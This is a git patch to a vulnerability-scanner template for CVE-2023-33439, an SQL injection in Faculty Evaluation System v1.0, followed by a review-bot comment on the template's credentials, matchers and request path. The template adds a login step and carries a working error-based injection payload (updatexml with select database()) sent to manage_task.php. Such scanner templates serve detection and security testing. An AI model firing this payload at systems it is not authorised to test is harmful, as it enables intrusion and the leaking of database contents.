From d389ef4754d6108efd8014308d11cc7f32b3d299 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 7 Jul 2023 15:30:05 +0530
Subject: [PATCH] Update CVE-2023-33439.yaml
---
 http/cves/2023/CVE-2023-33439.yaml | 21 ++++++++++++++-------
 1 file changed, 14 insertions(+), 7 deletions(-)
diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml
index eb3b71accc..af59e3f2a7 100644
--- a/http/cves/2023/CVE-2023-33439.yaml
+++ b/http/cves/2023/CVE-2023-33439.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-33439
 info:
- name: SQL Injection - Faculty Evaluation System
+ name: Faculty Evaluation System v1.0 - SQL Injection
 author: Harsh
 severity: high
 description: |
@@ -16,20 +16,27 @@ info:
 cwe-id: CWE-89
 metadata:
 verified: true
- tags: cve,cve2023,sql,unauthenticated
+ tags: cve,cve2023,sqli,faculty,authenticated
+
 http:
 - raw:
 - |
- GET /eval/admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
+ POST /ajax.php?action=login HTTP/1.1
 Host:{{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ email={{username}}&password={{password}}&login=1
+
+ - |
+ GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
+ Host:{{Hostname}}
+ cookie-reuse: true
 redirects: true
 matchers:
 - type: dsl
 dsl:
 - 'status_code == 200'
- - 'contains(body, "Fatal error")'
- - 'contains(body, "Uncaught Error: Call to a member function fetch_array()")'
+ - 'contains(body, "Fatal error:")'
+ - 'contains(body, "XPATH syntax error:")'
 condition: and
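Review bot: The login request added in the second hunk depends on `{{username}}` and `{{password}}`, but nothing in the visible lines declares or documents them. A scan run without valid credentials therefore produces no match, which is easy to misread as "not vulnerable". The `description` block lies outside the hunk, so its current wording cannot be checked; I would add a line there such as `Requires valid credentials, e.g. -var username=<user> -var password=<pass>`. The matchers also never confirm that the login succeeded and are not tied to the second response. If the engine version in use exposes indexed variables, `- 'contains(body_2, "XPATH syntax error:")'` and `- 'status_code_2 == 200'` would make explicit that the error string must come from the `manage_task.php` request. Separately, the `/eval` prefix was dropped from the request path, so installs served from a subdirectory may no longer be covered; that is worth confirming against the verified target.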